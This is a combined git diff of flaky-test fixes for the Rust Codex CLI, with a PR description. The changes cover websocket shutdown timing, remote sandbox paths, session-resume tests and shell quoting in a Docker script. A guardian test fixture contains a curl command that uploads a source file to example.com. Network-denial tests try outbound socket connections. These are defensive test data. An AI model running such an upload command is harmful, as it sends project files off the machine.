@@ -1246,7 +1246,10 @@ pub async fn start_websocket_server_with_headers(
             };
 
             if let Some(delay) = connection.accept_delay {
-                tokio::time::sleep(delay).await;
+                tokio::select! {
+                    _ = &mut shutdown_rx => return,
+                    _ = tokio::time::sleep(delay) => {}
+                }
             }
 
             let response_headers = connection.response_headers.clone();

--- a/codex-rs/core/tests/common/test_codex.rs
+++ b/codex-rs/core/tests/common/test_codex.rs
@@ -65,6 +65,8 @@ type PreBuildHook = dyn FnOnce(&Path) + Send + 'static;
 type WorkspaceSetup = dyn FnOnce(AbsolutePathBuf, Arc<dyn ExecutorFileSystem>) -> BoxFuture<'static, Result<()>>
     + Send;
 const TEST_MODEL_WITH_EXPERIMENTAL_TOOLS: &str = "test-gpt-5.1-codex";
+const REMOTE_CODEX_PATH_ENV_VAR: &str = "CODEX_TEST_REMOTE_CODEX_PATH";
+const REMOTE_CODEX_LINUX_SANDBOX_BASENAME: &str = "codex-linux-sandbox";
 const REMOTE_EXEC_SERVER_URL_ENV_VAR: &str = "CODEX_TEST_REMOTE_EXEC_SERVER_URL";
 static REMOTE_TEST_INSTANCE_COUNTER: AtomicU64 = AtomicU64::new(0);
 const SUBMIT_TURN_COMPLETE_TIMEOUT: Duration = Duration::from_secs(30);
@@ -73,6 +75,8 @@ const SUBMIT_TURN_COMPLETE_TIMEOUT: Duration = Duration::from_secs(30);
 pub struct TestEnv {
     environment: codex_exec_server::Environment,
     exec_server_url: Option<String>,
+    remote_codex_path: Option<PathBuf>,
+    remote_codex_linux_sandbox_exe: Option<PathBuf>,
     cwd: AbsolutePathBuf,
     local_cwd_temp_dir: Option<Arc<TempDir>>,
     remote_container_name: Option<String>,
@@ -87,6 +91,8 @@ impl TestEnv {
         Ok(Self {
             environment,
             exec_server_url: None,
+            remote_codex_path: None,
+            remote_codex_linux_sandbox_exe: None,
             cwd,
             local_cwd_temp_dir: Some(local_cwd_temp_dir),
             remote_container_name: None,
@@ -122,6 +128,11 @@ pub async fn test_env() -> Result<TestEnv> {
             let environment =
                 codex_exec_server::Environment::create_for_tests(Some(websocket_url.clone()))?;
             let cwd = remote_aware_cwd_path();
+            let remote_codex_path = remote_codex_path()?;
+            let remote_codex_linux_sandbox_exe = remote_codex_path
+                .as_deref()
+                .map(remote_codex_linux_sandbox_exe)
+                .transpose()?;
             environment
                 .get_filesystem()
                 .create_directory(
@@ -133,6 +144,8 @@ pub async fn test_env() -> Result<TestEnv> {
             Ok(TestEnv {
                 environment,
                 exec_server_url: Some(websocket_url),
+                remote_codex_path,
+                remote_codex_linux_sandbox_exe,
                 cwd,
                 local_cwd_temp_dir: None,
                 remote_container_name: Some(remote_env.container_name),
@@ -161,6 +174,25 @@ fn remote_exec_server_url() -> Result<String> {
         ));
     }
     Ok(listen_url.to_string())
+}
+
+fn remote_codex_path() -> Result<Option<PathBuf>> {
+    let Some(codex_path) = std::env::var_os(REMOTE_CODEX_PATH_ENV_VAR) else {
+        return Ok(None);
+    };
+    let codex_path = codex_path.to_string_lossy();
+    let codex_path = codex_path.trim();
+    if codex_path.is_empty() {
+        return Err(anyhow!("{REMOTE_CODEX_PATH_ENV_VAR} must not be empty"));
+    }
+    Ok(Some(PathBuf::from(codex_path)))
+}
+
+fn remote_codex_linux_sandbox_exe(remote_codex_path: &Path) -> Result<PathBuf> {
+    let remote_codex_dir = remote_codex_path
+        .parent()
+        .ok_or_else(|| anyhow!("{REMOTE_CODEX_PATH_ENV_VAR} must have a parent directory"))?;
+    Ok(remote_codex_dir.join(REMOTE_CODEX_LINUX_SANDBOX_BASENAME))
 }
 
 fn remote_test_instance_id() -> String {
@@ -404,9 +436,15 @@ impl TestCodexBuilder {
         test_env: TestEnv,
         include_local_environment: bool,
     ) -> anyhow::Result<TestCodex> {
-        let (config, fallback_cwd) = self
+        let (mut config, fallback_cwd) = self
             .prepare_config(base_url, &home, test_env.cwd().clone())
             .await?;
+        if let Some(remote_codex_path) = &test_env.remote_codex_path {
+            config.codex_self_exe = Some(remote_codex_path.clone());
+        }
+        if let Some(remote_codex_linux_sandbox_exe) = &test_env.remote_codex_linux_sandbox_exe {
+            config.codex_linux_sandbox_exe = Some(remote_codex_linux_sandbox_exe.clone());
+        }
         let exec_server_url = self
             .exec_server_url
             .clone()

--- a/codex-rs/core/tests/suite/compact_remote_parity.rs
+++ b/codex-rs/core/tests/suite/compact_remote_parity.rs
@@ -933,6 +933,10 @@ fn normalize_string(value: &str) -> String {
         return "<UUID>".to_string();
     }
 
+    if value.starts_with("<skills_instructions>\n") && value.ends_with("\n</skills_instructions>") {
+        return "<skills_instructions>\n...\n</skills_instructions>".to_string();
+    }
+
     let mut text = value.to_string();
     normalize_tmp_prefix_before_marker(&mut text, "/skills/");
     normalize_tmp_prefix_before_marker(&mut text, "\\skills\\");
@@ -1026,6 +1030,15 @@ fn normalize_string_rewrites_windows_temp_skill_paths() {
         "file: <CODEX_HOME>/skills/.system/imagegen/SKILL.md and \
          <CODEX_HOME>\\skills\\custom\\SKILL.md"
     );
+}
+
+#[test]
+fn normalize_string_rewrites_skills_instructions_body() {
+    let text = normalize_string(
+        "<skills_instructions>\n## Skills\n- imagegen: ...\n</skills_instructions>",
+    );
+
+    assert_eq!(text, "<skills_instructions>\n...\n</skills_instructions>");
 }
 
 #[test]

--- a/codex-rs/core/tests/suite/plugins.rs
+++ b/codex-rs/core/tests/suite/plugins.rs
@@ -292,9 +292,12 @@ async fn explicit_plugin_mentions_inject_plugin_guidance() -> Result<()> {
     write_plugin_mcp_plugin(codex_home.as_ref(), &rmcp_test_server_bin);
     write_plugin_app_plugin(codex_home.as_ref());
 
-    let codex =
-        build_apps_enabled_plugin_test_codex(&server, codex_home, apps_server.chatgpt_base_url)
-            .await?;
+    let codex = build_apps_enabled_plugin_test_codex(
+        &server,
+        Arc::clone(&codex_home),
+        apps_server.chatgpt_base_url,
+    )
+    .await?;
     wait_for_sample_mcp_ready(&codex).await?;
 
     codex

--- a/codex-rs/core/tests/suite/realtime_conversation.rs
+++ b/codex-rs/core/tests/suite/realtime_conversation.rs
@@ -662,7 +662,10 @@ async fn conversation_webrtc_close_while_sideband_connecting_drops_pending_join(
     let realtime_server = start_websocket_server_with_headers(vec![WebSocketConnectionConfig {
         requests: vec![vec![]],
         response_headers: Vec::new(),
-        accept_delay: Some(Duration::from_millis(500)),
+        // Keep the sideband handshake pending beyond the stale-event observation window below.
+        // Slow CI runners can otherwise complete the mock accept before the close path gets to
+        // abort the sideband task, which makes the negative handshake assertion scheduler-racy.
+        accept_delay: Some(Duration::from_secs(5)),
         close_after_requests: false,
     }])
     .await;

--- a/codex-rs/core/tests/suite/realtime_conversation.rs
+++ b/codex-rs/core/tests/suite/realtime_conversation.rs
@@ -649,6 +649,8 @@ async fn conversation_webrtc_start_posts_generated_session() -> Result<()> {
 async fn conversation_webrtc_close_while_sideband_connecting_drops_pending_join() -> Result<()> {
     skip_if_no_network!(Ok(()));
 
+    let sideband_accept_delay = Duration::from_millis(700);
+    let stale_sideband_observation_window = Duration::from_secs(1);
     let server = start_mock_server().await;
     Mock::given(method("POST"))
         .and(path_regex(".*/realtime/calls$"))
@@ -662,10 +664,9 @@ async fn conversation_webrtc_close_while_sideband_connecting_drops_pending_join(
     let realtime_server = start_websocket_server_with_headers(vec![WebSocketConnectionConfig {
         requests: vec![vec![]],
         response_headers: Vec::new(),
-        // Keep the sideband handshake pending beyond the stale-event observation window below.
-        // Slow CI runners can otherwise complete the mock accept before the close path gets to
-        // abort the sideband task, which makes the negative handshake assertion scheduler-racy.
-        accept_delay: Some(Duration::from_secs(5)),
+        // Keep the sideband handshake pending through the close path on slow CI without adding a
+        // multi-second fixed tail when the mock websocket server shuts down.
+        accept_delay: Some(sideband_accept_delay),
         close_after_requests: false,
     }])
     .await;
@@ -711,7 +712,7 @@ async fn conversation_webrtc_close_while_sideband_connecting_drops_pending_join(
     .await;
     assert_eq!(closed.reason.as_deref(), Some("requested"));
 
-    let stale_event = timeout(Duration::from_millis(700), async {
+    let stale_event = timeout(stale_sideband_observation_window, async {
         wait_for_event_match(&test.codex, |msg| match msg {
             EventMsg::RealtimeConversationRealtime(RealtimeConversationRealtimeEvent {
                 payload: RealtimeEvent::Error(message),

--- a/codex-rs/core/tests/suite/realtime_conversation.rs
+++ b/codex-rs/core/tests/suite/realtime_conversation.rs
@@ -649,8 +649,8 @@ async fn conversation_webrtc_start_posts_generated_session() -> Result<()> {
 async fn conversation_webrtc_close_while_sideband_connecting_drops_pending_join() -> Result<()> {
     skip_if_no_network!(Ok(()));
 
-    let sideband_accept_delay = Duration::from_millis(700);
-    let stale_sideband_observation_window = Duration::from_secs(1);
+    let sideband_accept_delay = Duration::from_secs(5);
+    let stale_sideband_observation_window = Duration::from_millis(700);
     let server = start_mock_server().await;
     Mock::given(method("POST"))
         .and(path_regex(".*/realtime/calls$"))
@@ -664,8 +664,8 @@ async fn conversation_webrtc_close_while_sideband_connecting_drops_pending_join(
     let realtime_server = start_websocket_server_with_headers(vec![WebSocketConnectionConfig {
         requests: vec![vec![]],
         response_headers: Vec::new(),
-        // Keep the sideband handshake pending through the close path on slow CI without adding a
-        // multi-second fixed tail when the mock websocket server shuts down.
+        // Keep the sideband handshake pending beyond the stale-event observation window below
+        // without adding a multi-second fixed tail when the mock websocket server shuts down.
         accept_delay: Some(sideband_accept_delay),
         close_after_requests: false,
     }])

--- a/codex-rs/core/tests/suite/unified_exec.rs
+++ b/codex-rs/core/tests/suite/unified_exec.rs
@@ -809,6 +809,8 @@ async fn unified_exec_network_denial_emits_failed_background_end_event() -> Resu
     let call_id = "uexec-network-denied";
     let args = json!({
         "cmd": "python3 -c \"import os, socket, time, urllib.parse; time.sleep(0.3); proxy = urllib.parse.urlparse(os.environ['HTTP_PROXY']); sock = socket.create_connection((proxy.hostname, proxy.port), timeout=2); sock.sendall(b'GET http://codex-network-denied.invalid/ HTTP/1.1\\r\\nHost: codex-network-denied.invalid\\r\\n\\r\\n'); sock.recv(1024); time.sleep(5)\"",
+        "shell": "sh",
+        "login": false,
         "yield_time_ms": 50,
     });
     let response_mock =
@@ -852,6 +854,8 @@ async fn unified_exec_short_lived_network_denial_emits_failed_end_event() -> Res
     let call_id = "uexec-short-network-denied";
     let args = json!({
         "cmd": "python3 -c \"import os, socket, urllib.parse; proxy = urllib.parse.urlparse(os.environ['HTTP_PROXY']); sock = socket.create_connection((proxy.hostname, proxy.port), timeout=2); sock.sendall(b'GET http://codex-short-network-denied.invalid/ HTTP/1.1\\r\\nHost: codex-short-network-denied.invalid\\r\\n\\r\\n'); sock.recv(1024)\"",
+        "shell": "sh",
+        "login": false,
         "yield_time_ms": 1000,
     });
     let response_mock =

--- a/codex-rs/core/tests/suite/unified_exec.rs
+++ b/codex-rs/core/tests/suite/unified_exec.rs
@@ -931,7 +931,7 @@ allow_local_binding = true
                 .set_permission_profile(permission_profile_for_config)
                 .expect("set permission profile");
         });
-    let test = builder.build_with_remote_env(server).await?;
+    let test = builder.build(server).await?;
     assert!(
         test.config.permissions.network.is_some(),
         "expected managed network proxy config to be present"

--- a/codex-rs/core/tests/suite/windows_sandbox.rs
+++ b/codex-rs/core/tests/suite/windows_sandbox.rs
@@ -54,7 +54,21 @@ fn stage_windows_sandbox_helpers() -> anyhow::Result<()> {
     let resources_dir = test_exe_dir.join("codex-resources");
     std::fs::create_dir_all(&resources_dir)?;
     for helper_name in ["codex-windows-sandbox-setup", "codex-command-runner"] {
-        let helper = codex_utils_cargo_bin::cargo_bin(helper_name)?;
+        let helper = match codex_utils_cargo_bin::cargo_bin(helper_name) {
+            Ok(helper) => helper,
+            Err(cargo_bin_error) => {
+                let helper = test_exe_dir
+                    .parent()
+                    .context("Windows test executable directory should have a parent directory")?
+                    .join(Path::new(helper_name).with_extension("exe"));
+                anyhow::ensure!(
+                    helper.exists(),
+                    "failed to resolve Windows sandbox helper {helper_name:?} via cargo_bin ({cargo_bin_error}); fallback path does not exist at {}",
+                    helper.display(),
+                );
+                helper
+            }
+        };
         let file_name = Path::new(helper_name).with_extension("exe");
         std::fs::copy(helper, resources_dir.join(file_name))?;
     }

--- a/codex-rs/exec/tests/suite/resume.rs
+++ b/codex-rs/exec/tests/suite/resume.rs
@@ -234,12 +234,12 @@ async fn exec_resume_last_accepts_prompt_after_flag_in_json_mode() -> anyhow::Re
 }
 
 #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
-async fn exec_resume_last_respects_cwd_filter_and_all_flag() -> anyhow::Result<()> {
+async fn exec_resume_last_all_ignores_cwd_filter() -> anyhow::Result<()> {
     skip_if_no_network!(Ok(()));
 
     let test = test_codex_exec();
     let server = MockServer::start().await;
-    let _response_mock = mount_exec_responses(&server, /*count*/ 5).await;
+    let _response_mock = mount_exec_responses(&server, /*count*/ 3).await;
 
     let dir_a = TempDir::new()?;
     let dir_b = TempDir::new()?;
@@ -253,6 +253,10 @@ async fn exec_resume_last_respects_cwd_filter_and_all_flag() -> anyhow::Result<(
         .arg(&prompt_a)
         .assert()
         .success();
+
+    // `updated_at` is second-granularity, so ensure thread B is created in a later second than
+    // thread A on fast CI (especially Windows).
+    std::thread::sleep(std::time::Duration::from_millis(1100));
 
     let marker_b = format!("resume-cwd-b-{}", Uuid::new_v4());
     let prompt_b = format!("echo {marker_b}");
@@ -269,29 +273,6 @@ async fn exec_resume_last_respects_cwd_filter_and_all_flag() -> anyhow::Result<(
         .expect("no session file found for marker_a");
     let path_b = find_session_file_containing_marker(&sessions_dir, &marker_b)
         .expect("no session file found for marker_b");
-
-    // `updated_at` is second-granularity, so ensure the touch lands in a later second
-    // than the initial session creation on fast CI (especially Windows).
-    std::thread::sleep(std::time::Duration::from_millis(1100));
-
-    // Make thread B deterministically newest according to rollout metadata.
-    let session_id_b = extract_conversation_id(&path_b);
-    let marker_b_touch = format!("resume-cwd-b-touch-{}", Uuid::new_v4());
-    let prompt_b_touch = format!("echo {marker_b_touch}");
-    test.cmd_with_server(&server)
-        .arg("--skip-git-repo-check")
-        .arg("-C")
-        .arg(dir_b.path())
-        .arg("resume")
-        .arg(&session_id_b)
-        .arg(&prompt_b_touch)
-        .assert()
-        .success();
-
-    // `resume --last` sorts by `updated_at`, which is second-granularity. Sleep so
-    // the upcoming `resume --last --all` write lands in a later second and becomes
-    // deterministically newest (instead of tying and falling back to UUID order).
-    std::thread::sleep(std::time::Duration::from_millis(1100));
 
     let marker_b2 = format!("resume-cwd-b-2-{}", Uuid::new_v4());
     let prompt_b2 = format!("echo {marker_b2}");
@@ -313,26 +294,84 @@ async fn exec_resume_last_respects_cwd_filter_and_all_flag() -> anyhow::Result<(
         "resume --last --all should pick newest session"
     );
 
-    let marker_a2 = format!("resume-cwd-a-2-{}", Uuid::new_v4());
-    let prompt_a2 = format!("echo {marker_a2}");
+    Ok(())
+}
+
+#[tokio::test(flavor = "multi_thread", worker_threads = 2)]
+async fn exec_resume_last_prefers_latest_matching_cwd() -> anyhow::Result<()> {
+    skip_if_no_network!(Ok(()));
+
+    let test = test_codex_exec();
+    let server = MockServer::start().await;
+    let _response_mock = mount_exec_responses(&server, /*count*/ 4).await;
+
+    let dir_a = TempDir::new()?;
+    let dir_b = TempDir::new()?;
+
+    let marker_a = format!("resume-cwd-a-{}", Uuid::new_v4());
+    let prompt_a = format!("echo {marker_a}");
+    test.cmd_with_server(&server)
+        .arg("--skip-git-repo-check")
+        .arg("-C")
+        .arg(dir_a.path())
+        .arg(&prompt_a)
+        .assert()
+        .success();
+
+    // `updated_at` is second-granularity, so ensure thread B is created in a later second than
+    // thread A on fast CI (especially Windows).
+    std::thread::sleep(std::time::Duration::from_millis(1100));
+
+    let marker_b = format!("resume-cwd-b-{}", Uuid::new_v4());
+    let prompt_b = format!("echo {marker_b}");
+    test.cmd_with_server(&server)
+        .arg("--skip-git-repo-check")
+        .arg("-C")
+        .arg(dir_b.path())
+        .arg(&prompt_b)
+        .assert()
+        .success();
+
+    let sessions_dir = test.home_path().join("sessions");
+    let path_a = find_session_file_containing_marker(&sessions_dir, &marker_a)
+        .expect("no session file found for marker_a");
+    let path_b = find_session_file_containing_marker(&sessions_dir, &marker_b)
+        .expect("no session file found for marker_b");
+
+    let session_id_b = extract_conversation_id(&path_b);
+    let marker_b_touch = format!("resume-cwd-b-touch-{}", Uuid::new_v4());
+    let prompt_b_touch = format!("echo {marker_b_touch}");
+    test.cmd_with_server(&server)
+        .arg("--skip-git-repo-check")
+        .arg("-C")
+        .arg(dir_a.path())
+        .arg("resume")
+        .arg(&session_id_b)
+        .arg(&prompt_b_touch)
+        .assert()
+        .success();
+
+    let marker_c = format!("resume-cwd-c-{}", Uuid::new_v4());
+    let prompt_c = format!("echo {marker_c}");
     test.cmd_with_server(&server)
         .arg("--skip-git-repo-check")
         .arg("-C")
         .arg(dir_a.path())
         .arg("resume")
         .arg("--last")
-        .arg(&prompt_a2)
+        .arg(&prompt_c)
         .assert()
         .success();
 
-    let resumed_path_cwd = find_session_file_containing_marker(&sessions_dir, &marker_a2)
-        .expect("no resumed session file containing marker_a2");
-    // The `--all` resume above appends a new turn to `path_b` while running from `dir_a`, so the
-    // session's latest cwd now matches `dir_a`. A subsequent `resume --last` should therefore pick
-    // the newest matching session (`path_b`).
+    let resumed_path_cwd = find_session_file_containing_marker(&sessions_dir, &marker_c)
+        .expect("no resumed session file containing marker_c");
     assert_eq!(
         resumed_path_cwd, path_b,
         "resume --last should prefer sessions whose latest turn context matches the current cwd"
+    );
+    assert_ne!(
+        resumed_path_cwd, path_a,
+        "resume --last should not fall back to the older matching cwd session"
     );
 
     Ok(())

--- a/codex-rs/secrets/src/lib.rs
+++ b/codex-rs/secrets/src/lib.rs
@@ -187,13 +187,27 @@ mod tests {
     use pretty_assertions::assert_eq;
 
     fn tempdir_outside_ambient_repo() -> tempfile::TempDir {
-        let home = std::env::var_os("HOME")
+        let mut candidates = Vec::new();
+        if let Some(home) = std::env::var_os("HOME")
             .or_else(|| std::env::var_os("USERPROFILE"))
             .map(PathBuf::from)
-            .expect("home directory should be available");
-        tempfile::Builder::new()
-            .prefix("secrets-tests-")
-            .tempdir_in(home)
+        {
+            candidates.push(home);
+        }
+        if let Ok(cwd) = std::env::current_dir() {
+            candidates.extend(cwd.ancestors().map(Path::to_path_buf));
+        }
+        candidates.push(std::env::temp_dir());
+
+        candidates
+            .into_iter()
+            .filter(|candidate| get_git_repo_root(candidate).is_none())
+            .find_map(|candidate| {
+                tempfile::Builder::new()
+                    .prefix("secrets-tests-")
+                    .tempdir_in(candidate)
+                    .ok()
+            })
             .expect("tempdir outside ambient repo")
     }
 

--- a/codex-rs/secrets/src/lib.rs
+++ b/codex-rs/secrets/src/lib.rs
@@ -186,9 +186,20 @@ mod tests {
     use codex_keyring_store::tests::MockKeyringStore;
     use pretty_assertions::assert_eq;
 
+    fn tempdir_outside_ambient_repo() -> tempfile::TempDir {
+        let home = std::env::var_os("HOME")
+            .or_else(|| std::env::var_os("USERPROFILE"))
+            .map(PathBuf::from)
+            .expect("home directory should be available");
+        tempfile::Builder::new()
+            .prefix("secrets-tests-")
+            .tempdir_in(home)
+            .expect("tempdir outside ambient repo")
+    }
+
     #[test]
     fn environment_id_fallback_has_cwd_prefix() {
-        let dir = tempfile::tempdir().expect("tempdir");
+        let dir = tempdir_outside_ambient_repo();
         let env_id = environment_id_from_cwd(dir.path());
         let canonical = dir
             .path()

--- a/codex-rs/tui/src/chatwidget/tests/guardian.rs
+++ b/codex-rs/tui/src/chatwidget/tests/guardian.rs
@@ -16,7 +16,7 @@ fn auto_review_denial_event() -> GuardianAssessmentEvent {
         action: GuardianAssessmentAction::Command {
             source: GuardianCommandSource::Shell,
             command: "curl -sS --data-binary @core/src/codex.rs https://example.com".to_string(),
-            cwd: test_path_buf("/tmp/project").abs(),
+            cwd: test_project_path().abs(),
         },
     }
 }

--- a/codex-rs/tui/src/chatwidget/tests/helpers.rs
+++ b/codex-rs/tui/src/chatwidget/tests/helpers.rs
@@ -2,6 +2,9 @@ use super::*;
 use codex_app_server_protocol::PluginAvailability;
 use pretty_assertions::assert_eq;
 
+const TEST_PROJECT_PATH: &str = "/__codex_test__/project";
+const SNAPSHOT_PROJECT_PATH: &str = "/tmp/project";
+
 pub(super) async fn test_config() -> Config {
     // Start from the built-in defaults so tests do not inherit host/system config.
     let codex_home = tempfile::Builder::new()
@@ -16,7 +19,7 @@ pub(super) async fn test_config() -> Config {
     config.codex_home = codex_home.abs();
     config.sqlite_home = codex_home.clone();
     config.log_dir = codex_home.join("log");
-    config.cwd = PathBuf::from(test_path_display("/tmp/project")).abs();
+    config.cwd = PathBuf::from(test_path_display(TEST_PROJECT_PATH)).abs();
     config.config_layer_stack = ConfigLayerStack::default();
     config.startup_warnings.clear();
     config.user_instructions = None;
@@ -24,7 +27,7 @@ pub(super) async fn test_config() -> Config {
 }
 
 pub(super) fn test_project_path() -> PathBuf {
-    PathBuf::from(test_path_display("/tmp/project"))
+    PathBuf::from(test_path_display(TEST_PROJECT_PATH))
 }
 
 pub(super) fn truncated_path_variants(path: &str) -> Vec<String> {
@@ -37,22 +40,25 @@ pub(super) fn truncated_path_variants(path: &str) -> Vec<String> {
 pub(super) fn normalize_snapshot_paths(text: impl Into<String>) -> String {
     let mut text = text.into();
 
-    for unix_path in ["/tmp/project", "/tmp/hooks.json"] {
+    for (unix_path, snapshot_path) in [
+        (TEST_PROJECT_PATH, SNAPSHOT_PROJECT_PATH),
+        ("/tmp/hooks.json", "/tmp/hooks.json"),
+    ] {
         let platform_path = test_path_display(unix_path);
-        if platform_path != unix_path {
-            text = text.replace(&platform_path, unix_path);
+        if platform_path != snapshot_path {
+            text = text.replace(&platform_path, snapshot_path);
         }
     }
 
-    let platform_test_cwd = test_path_display("/tmp/project");
-    if platform_test_cwd == "/tmp/project" {
+    let platform_test_cwd = test_path_display(TEST_PROJECT_PATH);
+    if platform_test_cwd == SNAPSHOT_PROJECT_PATH {
         text
     } else {
         for platform_prefix in truncated_path_variants(&platform_test_cwd)
             .into_iter()
             .rev()
         {
-            let unix_prefix: String = "/tmp/project"
+            let unix_prefix: String = SNAPSHOT_PROJECT_PATH
                 .chars()
                 .take(platform_prefix.chars().count())
                 .collect();
@@ -64,10 +70,10 @@ pub(super) fn normalize_snapshot_paths(text: impl Into<String>) -> String {
 }
 
 pub(super) fn normalized_backend_snapshot<T: std::fmt::Display>(value: &T) -> String {
-    let platform_test_cwd = test_path_display("/tmp/project");
+    let platform_test_cwd = test_path_display(TEST_PROJECT_PATH);
     let rendered = format!("{value}");
 
-    if platform_test_cwd == "/tmp/project" {
+    if platform_test_cwd == SNAPSHOT_PROJECT_PATH {
         return rendered;
     }
 

--- a/codex-rs/tui/src/chatwidget/tests/permissions.rs
+++ b/codex-rs/tui/src/chatwidget/tests/permissions.rs
@@ -97,7 +97,7 @@ async fn preset_matching_accepts_workspace_write_with_extra_roots() {
         .find(|p| p.id == "auto")
         .expect("auto preset exists");
     let current_profile = app_server_workspace_write_profile(test_path_buf("/tmp/extra").abs());
-    let cwd = test_path_buf("/tmp/project").abs();
+    let cwd = test_project_path().abs();
 
     assert!(
         ChatWidget::preset_matches_current(
@@ -145,7 +145,7 @@ async fn preset_matching_does_not_treat_non_cwd_writable_profile_as_read_only() 
             glob_scan_max_depth: None,
         },
     };
-    let cwd = test_path_buf("/tmp/project").abs();
+    let cwd = test_project_path().abs();
 
     assert!(
         !ChatWidget::preset_matches_current(

--- a/codex-rs/tui/src/chatwidget/tests/status_and_layout.rs
+++ b/codex-rs/tui/src/chatwidget/tests/status_and_layout.rs
@@ -2177,7 +2177,7 @@ async fn status_line_model_with_reasoning_includes_fast_for_fast_capable_models(
     set_fast_mode_test_catalog(&mut chat);
     assert!(get_available_model(&chat, "gpt-5.4").supports_fast_mode());
     chat.refresh_status_line();
-    let test_cwd = test_path_display("/tmp/project");
+    let test_cwd = test_project_path().display().to_string();
 
     assert_eq!(
         status_line_text(&chat),

--- a/scripts/test-remote-env.sh
+++ b/scripts/test-remote-env.sh
@@ -19,13 +19,17 @@ setup_remote_env() {
   local container_name
   local codex_binary_path
   local container_ip
+  local remote_codex_dir
   local remote_codex_path
+  local remote_codex_linux_sandbox_path
+  local remote_exec_server_dir
   local remote_exec_server_pid
   local remote_exec_server_port
   local remote_exec_server_stdout_path
 
   container_name="${CODEX_TEST_REMOTE_ENV_CONTAINER_NAME:-codex-remote-test-env-local-$(date +%s)-${RANDOM}}"
   codex_binary_path="${REPO_ROOT}/codex-rs/target/debug/codex"
+  remote_codex_path="${CODEX_TEST_REMOTE_CODEX_PATH:-}"
 
   if ! command -v docker >/dev/null 2>&1; then
     echo "docker is required (Colima or Docker Desktop)" >&2
@@ -65,15 +69,20 @@ setup_remote_env() {
   fi
 
   if [[ -z "${CODEX_TEST_REMOTE_EXEC_SERVER_URL:-}" ]]; then
-    remote_codex_path="/tmp/codex-remote-env/codex"
+    remote_codex_path="${remote_codex_path:-/tmp/codex-remote-env/codex}"
+    remote_codex_dir="$(dirname "${remote_codex_path}")"
+    remote_codex_linux_sandbox_path="${remote_codex_dir}/codex-linux-sandbox"
     remote_exec_server_port="31987"
     remote_exec_server_stdout_path="/tmp/codex-remote-env/exec-server.stdout"
-    docker exec "${container_name}" sh -lc "mkdir -p /tmp/codex-remote-env"
+    remote_exec_server_dir="$(dirname "${remote_exec_server_stdout_path}")"
+    docker exec "${container_name}" mkdir -p "${remote_codex_dir}" "${remote_exec_server_dir}"
     docker cp "${codex_binary_path}" "${container_name}:${remote_codex_path}"
     docker exec "${container_name}" chmod +x "${remote_codex_path}"
+    docker exec "${container_name}" ln -sf "${remote_codex_path}" "${remote_codex_linux_sandbox_path}"
     remote_exec_server_pid="$(
       docker exec "${container_name}" sh -lc \
-        "rm -f ${remote_exec_server_stdout_path}; nohup ${remote_codex_path} exec-server --listen ws://0.0.0.0:${remote_exec_server_port} > ${remote_exec_server_stdout_path} 2>&1 & echo \$!"
+        'rm -f "$1"; nohup "$2" exec-server --listen "ws://0.0.0.0:$3" > "$1" 2>&1 & echo $!' \
+        sh "${remote_exec_server_stdout_path}" "${remote_codex_path}" "${remote_exec_server_port}"
     )"
     wait_for_remote_exec_server_port "${container_name}" "${remote_exec_server_port}" "${remote_exec_server_stdout_path}"
     container_ip="$(
@@ -89,6 +98,11 @@ setup_remote_env() {
   fi
 
   export CODEX_TEST_REMOTE_ENV="${container_name}"
+  if [[ -n "${remote_codex_path}" ]]; then
+    export CODEX_TEST_REMOTE_CODEX_PATH="${remote_codex_path}"
+  else
+    unset CODEX_TEST_REMOTE_CODEX_PATH
+  fi
 }
 
 wait_for_remote_exec_server_port() {
@@ -105,7 +119,7 @@ wait_for_remote_exec_server_port() {
   done
 
   echo "timed out waiting for remote exec-server on ${container_name}:${port}" >&2
-  docker exec "${container_name}" sh -lc "cat ${stdout_path} 2>/dev/null || true" >&2 || true
+  docker exec "${container_name}" sh -lc 'cat "$1" 2>/dev/null || true' sh "${stdout_path}" >&2 || true
   return 1
 }
 
@@ -116,6 +130,7 @@ codex_remote_env_cleanup() {
   fi
   unset CODEX_TEST_REMOTE_EXEC_SERVER_PID
   unset CODEX_TEST_REMOTE_EXEC_SERVER_URL
+  unset CODEX_TEST_REMOTE_CODEX_PATH
 }
 
 if ! is_sourced; then
@@ -128,6 +143,7 @@ set -euo pipefail
 if setup_remote_env; then
   status=0
   echo "CODEX_TEST_REMOTE_ENV=${CODEX_TEST_REMOTE_ENV}"
+  echo "CODEX_TEST_REMOTE_CODEX_PATH=${CODEX_TEST_REMOTE_CODEX_PATH:-}"
   echo "CODEX_TEST_REMOTE_EXEC_SERVER_URL=${CODEX_TEST_REMOTE_EXEC_SERVER_URL}"
   echo "Remote env ready. Run your command, then call: codex_remote_env_cleanup"
 else


### PR DESCRIPTION
## Why

Verify whether the current candidate full-ci flake fixes go green when applied together on a fresh `origin/main` branch, without changing the source PRs.

## What

Collapse these fix PRs into one side branch for a single `rust-ci-full` verification run:

- #22743
- #22742
- #22741
- #22910
- #22922
- #23447
- #21506
- #23528
- #23597
- #23598
- #23599
- #23614
- #23621
- #23622

`#23447` and `#23597` carry patch-identical non-git cwd fixture fixes, so this verification branch includes that fix once.

## Verification

- Intended validation: fresh `rust-ci-full` run on this side branch.
- Local validation not run; the source PRs already carry their focused validation and this branch exists only to answer the combined full-ci question.